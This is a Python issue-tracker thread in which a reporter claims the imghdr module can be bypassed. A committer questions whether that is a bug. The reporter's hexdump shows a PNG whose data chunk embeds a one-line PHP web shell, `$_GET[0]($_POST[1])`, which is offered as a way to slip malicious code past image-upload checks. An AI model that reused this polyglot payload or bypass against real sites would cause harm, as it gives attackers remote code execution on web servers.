classification
Title: Bypass imghdr module determines the type of image
Type: behavior Stage:
Components: Library (Lib) Versions: Python 3.5
process
Status: open Resolution:
Dependencies: Superseder:
Assigned To: Nosy List: Ramin Farajpour Cami, serhiy.storchaka, steven.daprano
Priority: normal Keywords:

Created on 2016-02-11 05:55 by Ramin Farajpour Cami, last changed 2016-02-11 11:33 by Ramin Farajpour Cami.

Files
File name Uploaded Description Edit
phppng.png Ramin Farajpour Cami, 2016-02-11 05:55
Messages (4)
msg260074 - (view) Author: Ramin Farajpour Cami (Ramin Farajpour Cami) Date: 2016-02-11 05:55
import imghdr
imghdr.what('phppng.png')

output : 
'png'

if you set javascript script in file .png or .jpg ,
output : 
ValueError: invalid \x escape

Hexdump:
root@Ramin:~# hexdump -C phppng.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52
|.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  
|... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e
|.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 60 49 44 41 54 48 89  |...+.....`IDATH.|
00000040  63 5c 3c 3f 3d 24 5f 47  45 54 5b 30 5d 28 24 5f  
|c\<?=$_GET[0]($_|  ### Here PHP Code 
00000050  50 4f 53 54 5b 31 5d 29  3b 3f 3e 58 80 81 81 c1  |POST[1]);?>X....|
00000060  73 5e 37 93 fc 8f 8b db  7e 5f d3 7d aa 27 f7 f1  |s^7.....~_.}.'..|
00000070  e3 c9 bf 5f ef 06 7c b2  30 30 63 d9 b9 67 fd d9  |..._..|.00c..g..|
00000080  3d 1b ce 32 8c 82 51 30  0a 46 c1 28 18 05 a3 60  |=..2..Q0.F.(...`|
00000090  14 8c 82 51 30 0a 86 0d  00 00 81 b2 1b 02 07 78  |...Q0..........x|
000000a0  0d 0c 00 00 00 00 49 45  4e 44 ae 42 60 82        |......IEND.B`.|
000000ae
msg260080 - (view) Author: Steven D'Aprano (steven.daprano) * (Python committer) Date: 2016-02-11 09:53
I'm sorry, I don't understand what you think is the bug here. It looks like you are passing a corrupted file which has a PNG extension but is not actually a PNG file (it contains PHP code). What do you expect should happen?
msg260082 - (view) Author: Ramin Farajpour Cami (Ramin Farajpour Cami) Date: 2016-02-11 10:21
images can be served with a content type of text/html,(which means we can certainly inject HTML).
msg260091 - (view) Author: Ramin Farajpour Cami (Ramin Farajpour Cami) Date: 2016-02-11 11:33
In normal if you choose a image and open image with editor set codes to image you get error , but I able to bypass image for upload if I use module imghdr for check valid image , booom upload image with malicious code ,
History
Date User Action Args
2016-02-11 11:33:56Ramin Farajpour Camisetmessages: + msg260091
2016-02-11 10:21:20Ramin Farajpour Camisetmessages: + msg260082
2016-02-11 09:53:16steven.dapranosetnosy: + steven.daprano
messages: + msg260080
2016-02-11 08:15:59Ramin Farajpour Camisetnosy: + serhiy.storchaka
2016-02-11 05:55:17Ramin Farajpour Camicreate